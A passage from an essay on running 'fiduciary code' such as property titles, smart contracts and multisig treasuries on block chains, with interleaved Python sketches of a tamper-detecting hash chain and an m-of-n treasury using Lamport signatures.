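    """Recompute every link; return the index of the first broken one, or None."""
    prev = GENESIS
    for i, e in enumerate(chain):
        if e["prev"] != prev or e["hash"] != entry_hash(prev, e["tx"]):
            return i
        prev = e["hash"]
    return None

def majority_head(replicas):
    """Head hash shared by a strict majority of replicas, counting valid chains only."""
    heads = Counter(r[-1]["hash"] for r in replicas if r and first_bad_entry(r) is None)
    if not heads:
        return None
    head, votes = heads.most_common(1)[0]
    return head if 2 * votes > len(replicas) else None

def demo():
    """Constructed sample data: one honest ledger and two tampered copies."""
    txs = [{"from": "alice", "to": "bob", "amount": 5},
           {"from": "bob", "to": "carol", "amount": 2}]
    forged = [{"from": "alice", "to": "mallory", "amount": 5}, txs[1]]
    honest = build(txs)
    edited = [dict(e) for e in honest]
    edited[0]["tx"] = forged[0]   # in-place edit: the stored hashes no longer match
    rewritten = build(forged)     # full rewrite: internally valid, different head
    return honest, edited, rewritten
```

The in-place edit is caught by the hash chain alone, while the fully rewritten copy passes its own check and is rejected only because its head hash disagrees with the majority, which is why the text credits the protocol and the cryptography together.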

A big drawback is that our online and distributed block chain computer is much slower and more costly than a web server: by one very rough estimate, about 10,000 times slower and more costly, or about the same as it cost to run a program on a normal computer in 1985. For this reason, we only run on the block chain that portion of an application that needs to be the most reliable and secure: what I call fiduciary code. Since the costs of human ("wet") problems caused by the unreliability and insecurity of web servers running fiduciary code are often far higher than the extra hardware needed to run block chain code, when web server reliability and security fall short, as they often do for fiduciary computations such as payments and financial contracts, it will often make more sense to run that code on the block chain than to run it less reliably and securely on a web server. Even better, the block chain makes possible new fiduciary-intensive applications, such as posting raw money itself to the Internet, securely and reliably accessible anywhere on the globe: apps that we would never dare do with a web server.

What kinds of fiduciary code can we run? We are still thinking up new applications and the categories will be in flux, but a very productive approach is to think of fiduciary applications by analogy to traditional legal code that governs traditional fiduciary institutions. Fiduciary code will often execute some of the functions traditionally thought of as the role of commercial law or security, but with software that securely and reliably spans the globe regardless of traditional jurisdiction. Thus:

* Property titles (registered assets), where the on-chain registry is either the legally official registry for off-chain assets or controls on-chain ones, thus providing reliable and secure custody of them. One can think of a cryptocurrency such as Bitcoin as property titles (or at least custody enforced by the block chain consensus protocol) to bits recognized as being a fixed portion of a currency, or as controlling unforgeably costly bits, or both. Block chains could also control hardware which controls the function of and access to physical property.

* Smart contracts: here users (typically two of them) agree via user interface to execute block chain code, which may include transfer of money and other chain-titled assets at various times or under various conditions, transfer and verification of other kinds of information, and other combinations of wet or traditional (off-chain) and dry (on-chain) performance. A block chain can hold cryptocurrency as collateral (like an escrow) which incentivizes off-chain performance that can be verified on-chain, by the parties or by third parties. A full block chain computer can pool on-chain assets into a single chain-controlled risk pool spread among many similar financial contracts, reducing the amount of collateral that needs to be stored on-chain while minimizing the need for off-chain collateral calls. The block chain can also make the search, negotiation, and verification phases of contracting more reliable and secure. With on-chain smart contracts we will be able to buy and sell many online services and financial instruments by button and slider instead of by laboriously filling out forms that disclose our private information.

* On-chain treasuries, trusts, and similar, where money lives on the block chain and is controlled by multiple signature ("multisig") authority. Putting a treasury with signature authority on a block chain computer is low-hanging fruit, but is often tied to more speculative efforts under the label "distributed autonomous organization (DAO)", which may include voting shares and other mechanisms to control the treasury like a corporation or other kind of organization.
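A treasury under multiple signature authority can be sketched as a small state machine that releases funds only when enough distinct key holders have signed the same payment order. This is an added example, not code from the original post or from any block chain project; the Treasury class, the order format and the 2-of-3 threshold are assumptions, and Lamport one-time signatures are swapped in here only because they need nothing beyond a hash function.

```python
import hashlib
import json
import os

def H(b):
    return hashlib.sha256(b).digest()

def keygen():
    """Lamport one-time key pair: 256 secret pairs; the public key is their hashes."""
    sk = [(os.urandom(32), os.urandom(32)) for _ in range(256)]
    return sk, [(H(a), H(b)) for a, b in sk]

def bits(msg):
    d = int.from_bytes(H(msg), "big")
    return [(d >> i) & 1 for i in range(256)]

def sign(sk, msg):
    """Reveal one secret per digest bit. Each key may sign one message only."""
    return [sk[i][b] for i, b in enumerate(bits(msg))]

def verify(pk, msg, sig):
    """Each revealed secret must hash to the public value for that digest bit."""
    return len(sig) == 256 and all(
        H(s) == pk[i][b] for i, (s, b) in enumerate(zip(sig, bits(msg))))

class Treasury:
    """Hypothetical m-of-n treasury; keys would be rotated after every order."""

    def __init__(self, pubkeys, threshold, balance):
        self.pubkeys, self.threshold, self.balance = pubkeys, threshold, balance
        self.nonce = 0  # part of every order, so a used order cannot be replayed

    def order(self, to, amount):
        """Canonical bytes that every approving key holder signs."""
        fields = {"to": to, "amount": amount, "nonce": self.nonce}
        return json.dumps(fields, sort_keys=True).encode()

    def spend(self, to, amount, sigs):
        """sigs maps signer index -> signature over self.order(to, amount)."""
        msg = self.order(to, amount)
        approvals = {i for i, s in sigs.items()
                     if 0 <= i < len(self.pubkeys) and verify(self.pubkeys[i], msg, s)}
        if len(approvals) < self.threshold or not 0 < amount <= self.balance:
            return False
        self.balance -= amount
        self.nonce += 1
        return True
```

Approvals are counted per key index after verification against that index's public key, so one holder submitting a signature under two indices still counts once.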

I hope to discuss these block chain applications, especially smart contracts, in future posts. While there is much futurism in many block chain discussions, including many trying to solve problems that aren't actually solved by the block chain, I will generally stick to low-hanging fruit that could be usefully implemented on QuixCoin, Ethereum, or similar technology in the near future, often interfacing to still necessary parts of traditional protocols and institutions rather than trying to reinvent and replace them in whole.

References

Here is a list of basic computer science papers describing the technology of block chains (including cryptocurrencies).

Wet vs. dry code